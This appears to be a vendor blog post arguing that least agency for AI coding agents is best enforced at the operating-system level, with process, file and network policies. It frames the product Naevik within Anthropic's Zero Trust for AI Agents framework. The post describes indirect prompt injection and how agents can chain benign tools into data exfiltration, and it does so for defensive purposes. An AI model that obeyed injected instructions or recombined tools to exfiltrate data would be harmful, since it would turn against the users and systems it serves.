Zero Trust

Least agency needs an enforcement point. That point is the OS.

Anthropic’s Zero Trust for AI Agents names the principle that matters most for agentic software: govern what an agent can do, not just what it can access. Prompt- and tool-layer controls reduce the risk — host-level enforcement bounds the damage when an agent is compromised.

From least privilege to least agency

Least agency needs an enforcement point. For AI agents running on your machine, that point is the operating system.

Anthropic’s Zero Trust for AI Agents gives the right name to one of the most important principles for agentic software: govern what an agent can do, not only what it can access. The term itself comes from the OWASP Top 10 for Agentic Applications, which extends least privilege and “excessive agency” into least agency. Least privilege asks whether an identity can reach a resource. Least agency asks a sharper question: once an agent can reach something, which actions is it actually allowed to take?

That distinction matters because agents don’t behave like traditional software. They interpret goals, choose their own tools, and chain multi-step actions you never scripted — across files, processes, APIs, and networks. Least privilege was built for the first world; least agency is built for the second. A database tool that can only read. A summarizer that can’t send or delete. An agent that can run a build but can’t open a connection to an unknown host.

The enforcement boundary that matters

Naming the principle is the easy part. The framework is right to call for sandboxing, access scoping, input and output controls, and memory safeguards. The question that decides whether any of it holds is where the boundary is actually enforced — and most of the obvious places can be talked around.

The prompt layer can’t be the boundary. In practice you should not rely on a model to consistently distinguish untrusted data it is reading from instructions it should follow; indirect prompt injection — a malicious instruction buried in a web page or email the agent processes — turns exactly that ambiguity into action. The framework’s own stance is to assume the model layer can be compromised.

The tool layer can’t fully be the boundary either. Allow-listing tools helps, but a capable agent recombines legitimate tools into harmful sequences: a read tool plus a network tool becomes exfiltration, and each call, viewed alone, looks fine.

What’s left is the layer underneath all of it — the one place every tool call, every script, every file write, every outbound connection ultimately resolves: the operating system. Process execution, file access, and network connections are where “what an agent is allowed to do” stops being a policy document and becomes an enforced fact.

Prompt- and tool-layer controls reduce the risk that an agent is compromised. Host-level enforcement bounds the damage when one is. The boundary that holds is the one the agent can’t argue with.

The test that decides which controls are real

Anthropic’s framework offers a single test that cuts through most security theater: does your control make an attack impossible, or merely inconvenient? Tireless, automatable, near-zero-cost attackers grind down anything that only adds friction. The controls that survive remove capability outright — its rule of thumb is, when in doubt, remove a capability rather than restrict it.

That is what host-level enforcement does for agent actions. When policy says an agent may not execute an unapproved binary, write outside its workspace, or open a connection to an unapproved host, the OS doesn’t make that harder — it refuses it. A denied process launch returns an error; a denied file open never opens; a denied connection never completes. For the actions it mediates, that is an impossibility control rather than a friction control — a kernel denial can’t be argued out of the way a prompt or a tool list can.

Assume breach, then bound the blast radius

Put the two ideas together. Prompt injection is not a rare edge case; it is a recurring failure mode across agentic workflows. So assume the agent will be compromised at some point. The useful question is no longer “how do we keep it from being compromised?” but “when it is, what can it still do?”

That is the blast radius. An agent turned against you still can’t run a binary that isn’t allow-listed, still can’t read files outside policy, still can’t reach a network endpoint policy forbids — if those limits are enforced below the model, at the host. Enforce least agency anywhere above the OS and a compromised agent can argue or recombine its way around it. Enforce it at the OS and the argument is over.

What Naevik is not

Honesty is part of a real defense, so it’s worth being precise about the boundary before claiming the value. Naevik is not a prompt-injection filter and not a jailbreak classifier. Input and output controls — spotlighting, classifier-based filtering, human-in-the-loop approval — belong in your stack, and they lower the odds that an agent is compromised. Naevik works one layer down and assumes those controls can be bypassed. Its job is to bound the damage when an agent is compromised anyway. The two are complementary, not competing.

Where Naevik fits

Within Zero Trust for AI Agents, Naevik is the host enforcement point for the action-level half of the model. It mediates what AI coding agents — Claude Code, Claude Desktop, agents inside VS Code, and others — are allowed to execute, touch, and connect to, evaluated at the OS before the action takes effect.

Framework calls forNaevik on the host
Access & privilege — default-deny; define allowed/denied actions per agentStrict posture: default-deny + allow-list; per-rule allow/deny on process, file, and network actions
Isolation — “isolate at the receiving end”Process, file, and network ACLs on the machine where the agent actually acts
Observability — full logs with context, immutable trailLocal audit log of every mediated action, with context; uploaded to the management server for retention
Monitoring & response — baseline, then containLog-only or blocking enforcement, set per policy

The enforcement uses whatever authorization path each OS actually provides. On Linux, that can mean BPF LSM. On macOS, Endpoint Security covers process and file authorization, while network controls use platform-native filtering. On Windows, a kernel-mode driver enforces it — before a process launches, a file is accessed, or an outbound connection completes. None of it trusts the prompt.

That enforcement layer is only getting deeper: agent-control primitives are starting to move into the OS and down into silicon, from Windows and NVIDIA’s RTX Spark platform to BlueField DPUs in the data center. That is the same argument one level lower — the boundary belongs below the agent — and it is a story of its own (agent security is moving into silicon). Naevik’s role doesn’t change: the cross-platform, agent-agnostic policy and audit layer that rides whatever primitive each system provides.

There is a second benefit when an attack is novel: because Naevik logs every mediated action, an agent that tries something outside policy doesn’t just get blocked — it leaves a record of what it attempted, and when.

Designed for breach from day one

Anthropic’s framework closes on a line worth keeping: the best-prepared organizations aren’t the ones with the most advanced AI — they’re the ones architected for breach from day one. For an AI agent on your machine, that has a concrete meaning. The agent may be useful; the model may be tricked; the host can still enforce the boundary.

That’s where Naevik starts. You write the policy — what each agent may run, read, and reach — and the operating system enforces it. Least agency stops being a principle on a page and becomes a check the OS runs before each mediated process, file, or network action completes.

← All insights